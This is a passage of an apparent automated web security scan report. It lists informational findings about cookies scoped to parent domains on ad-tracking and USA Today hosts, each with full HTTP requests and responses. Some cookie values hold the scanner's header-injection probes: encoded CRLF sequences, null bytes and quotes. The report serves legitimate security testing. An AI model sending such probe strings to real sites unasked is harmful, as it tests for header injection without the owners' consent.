Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C4%2C29%2C%2C%267751%3D14656%2C0%2C1%2C%2C6069c2e8bf59d5d46e70329b%2624831%0D%0A4e77fd0dd5f%3D14657%2C0%2C1%2C%2C%2684555%250d%250a76073097ace%3D14657%2C0%2C1%2C%2C%261e49b%00%0D%0A021fe9e2610%3D14657%2C0%2C1%2C%2C%265364e6226%0D%0A20a447c6f1a%3D14657%2C0%2C1%2C%2C%26536489345%250d%250a30a7789986a%3D14657%2C0%2C1%2C%2C%265364c2fb0%00%0D%0Aef4d9f296de%3D14657%2C0%2C1%2C%2C%265364%27%3D14657%2C0%2C1%2C%2C%265364%2527%3D14657%2C0%2C1%2C%2C%265364%00%27%3D14657%2C0%2C1%2C%2C%265364%22%3D14657%2C0%2C1%2C%2C%264212%3D14657%2C0%2C1%2C%2C; expires=Tue, 04-Oct-2011 01:08:20 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1185=2925993182975414771; expires=Thu, 03-Nov-2011 01:08:20 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

13.60. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; expires=Tue, 04-Oct-2011 00:44:46 GMT; path=/; domain=.rubiconproject.com
put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; expires=Wed, 14-Sep-2011 00:44:46 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4210&nid=1523&put=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F&expires=10 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=6291/9346
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; rdk=6291/9346; rdk15=0; ses15=5032^1&9346^1; csi15=3203911.js^1^1315097079^1315097079; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:44:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; expires=Tue, 04-Oct-2011 00:44:46 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C; expires=Tue, 04-Oct-2011 00:44:46 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; expires=Wed, 14-Sep-2011 00:44:46 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

13.61. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rpb=7908%3D1%264940%3D1%2663ab8%0D%0A01bb4e98c34%3D1%262f3e7%250d%250abefce76579c%3D1%26658e0%00%0D%0A6b8eb56a945%3D1%264210330d2%0D%0A8b1ecee0312%3D1%26421091ced%250d%250af3ebd5f25d3%3D1%264210aa2c8%00%0D%0A9382c866592%3D1%264210%27%3D1%264210%2527%3D1%264210%00%27%3D1%264210%22%3D1%264210%3D1%267751%3D1; expires=Tue, 04-Oct-2011 01:03:09 GMT; path=/; domain=.rubiconproject.com
put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; expires=Tue, 04-Oct-2011 01:03:09 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=7751&nid=2249&expires=30&put=CAESEGMUSetziKiEuzwBhcLJxAU&google_cver=1 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=6291/9346
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; rpb=7908%3D1%264940%3D1%265364%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C0%2C1%2C%2C; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=5032^1; rdk=6291/9346; rdk2=0; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%2663ab8%0D%0A01bb4e98c34%3D1%262f3e7%250d%250abefce76579c%3D1%26658e0%00%0D%0A6b8eb56a945%3D1%264210330d2%0D%0A8b1ecee0312%3D1%26421091ced%250d%250af3ebd5f25d3%3D1%264210aa2c8%00%0D%0A9382c866592%3D1%264210%27%3D1%264210%2527%3D1%264210%00%27%3D1%264210%22%3D1%264210%3D1%267751%3D1; expires=Tue, 04-Oct-2011 01:03:09 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C0%2C1%2C%2C6069c2e85f977687d81d3d36%264210%3D14657%2C0%2C32%2C%2C%2663ab8%0D%0A01bb4e98c34%3D14657%2C0%2C1%2C%2C%262f3e7%250d%250abefce76579c%3D14657%2C0%2C1%2C%2C%26658e0%00%0D%0A6b8eb56a945%3D14657%2C0%2C1%2C%2C%264210330d2%0D%0A8b1ecee0312%3D14657%2C0%2C1%2C%2C%26421091ced%250d%250af3ebd5f25d3%3D14657%2C0%2C1%2C%2C%264210aa2c8%00%0D%0A9382c866592%3D14657%2C0%2C1%2C%2C%264210%27%3D14657%2C0%2C1%2C%2C%264210%2527%3D14657%2C0%2C1%2C%2C%264210%00%27%3D14657%2C0%2C1%2C%2C%264210%22%3D14657%2C0%2C1%2C%2C%267751%3D14657%2C0%2C1%2C%2C; expires=Tue, 04-Oct-2011 01:03:09 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; expires=Tue, 04-Oct-2011 01:03:09 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

13.62. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1; expires=Tue, 04-Oct-2011 01:07:13 GMT; path=/; domain=.rubiconproject.com
put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; expires=Tue, 04-Oct-2011 01:07:13 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=5364&nid=2046&put=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=6291/9346
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%265364%3D1%267751%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C0%2C1%2C%2C%267751%3D14656%2C0%2C1%2C%2C; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; rdk=6291/9346; rdk15=0; ses15=5032^1&9346^1; csi15=3203911.js^1^1315097079^1315097079

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:07:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1; expires=Tue, 04-Oct-2011 01:07:13 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C4%2C2%2C%2C%267751%3D14657%2C0%2C65%2C%2C; expires=Tue, 04-Oct-2011 01:07:13 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; expires=Tue, 04-Oct-2011 01:07:13 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

13.63. http://r.openx.net/set previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.openx.net
Path:	/set

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

i=4e28a2c0-3fbe-4680-b440-7249a1d4d410; expires=Tue, 03-Sep-2013 01:23:25 GMT; path=/; domain=.openx.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set HTTP/1.1
Host: r.openx.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:23:25 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=4e28a2c0-3fbe-4680-b440-7249a1d4d410; expires=Tue, 03-Sep-2013 01:23:25 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

13.64. http://r.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/pixel.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=3033228098597162936; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:06:01 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2925993182975414771

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3033228098597162936; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:06:01 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:06:00 GMT
Content-Length: 342

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
src="http://cdn.turn.com/server/ddc.htm?uid=3033228098597162936&rnd=3093449532631709493&fpid=4&nu=n&t=
...[SNIP]...

13.65. http://rt.legolas-media.com/lgrt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rt.legolas-media.com
Path:	/lgrt

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

lgtix=BgABADMBSQABADMBHAACADMBDAABADMB/QABADABXwABADMB; path=/; expires=Wed, 03 Sep 2014 00:48:45 GMT; domain=.legolas-media.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lgrt?ci=2&ei=9&ti=28&pbi=37 HTTP/1.1
Host: rt.legolas-media.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui=5ea31fa9-d42d-458f-9bb4-1700d69738c0; lgtix=/QABADAB

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:48:45 GMT
Server: Apache
Expires: -1
Cache-Control: no-cache; no-store
Content-Type: application/javascript
Set-Cookie: lgtix=BgABADMBSQABADMBHAACADMBDAABADMB/QABADABXwABADMB; path=/; expires=Wed, 03 Sep 2014 00:48:45 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 5
Connection: close

true;

13.66. http://segments.adap.tv/data previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segments.adap.tv
Path:	/data

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]},\"42\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Wed, 13-May-2043 02:31:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /data?p=quantcast-lal&type=gif&segment=D,T&add=true HTTP/1.1
Host: segments.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"; adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+17%3A44%3A46"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: image/gif
Connection: Keep-Alive
Set-Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]},\"42\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Wed, 13-May-2043 02:31:30 GMT
Content-Length: 42

GIF89a.............!.......,...........D.;

13.67. http://segments.adap.tv/data/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segments.adap.tv
Path:	/data/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]},\"2\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]},\"20\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]},\"41\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Wed, 13-May-2043 03:00:43 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /data/?p=brilig&type=gif&add=true HTTP/1.1
Host: segments.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"; adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+17%3A44%3A46"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: image/gif
Connection: Keep-Alive
Set-Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]},\"2\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]},\"20\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]},\"41\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Wed, 13-May-2043 03:00:43 GMT
Content-Length: 42

GIF89a.............!.......,...........D.;

13.68. http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/Stats/Tracker.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Stats/Tracker.gif?plckUrl=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1&plckUserId=null&plckGcid=Pluck4&plckCurrentTime=1315096975548 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: usatprod=R1449690983; s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 0
Content-Encoding: deflate
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Date: Sun, 04 Sep 2011 00:42:18 GMT
Connection: close

13.69. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/sys/jsonp.app

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=545853.blog&clientUrl=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; SiteLifeHost=gnvm3l3pluckcom; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Cache-Control: private
Content-Length: 43017
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Date: Sun, 04 Sep 2011 00:44:38 GMT
Connection: close

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...

13.70. http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/usat/pluck/comments/comments.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/usat/pluck/comments/comments.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Cache-Control: private
Content-Length: 37055
Content-Type: application/x-javascript
Last-Modified: Sat, 03 Sep 2011 08:35:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Date: Sun, 04 Sep 2011 00:42:24 GMT
Connection: close

// Plugin to contain scripts frequently used across multiple widgets
// Minipersona, report abuse, that sort of thing.
pluckAppProxy.registerPlugin("pluck/comments/comments.js",
// init function, c
...[SNIP]...

13.71. http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sitelife.usatoday.com
Path:	/ver1.0/usat/pluck/pluck.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/usat/pluck/pluck.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449690983

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Cache-Control: private
Content-Length: 53489
Content-Type: application/x-javascript
Last-Modified: Sat, 03 Sep 2011 08:35:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
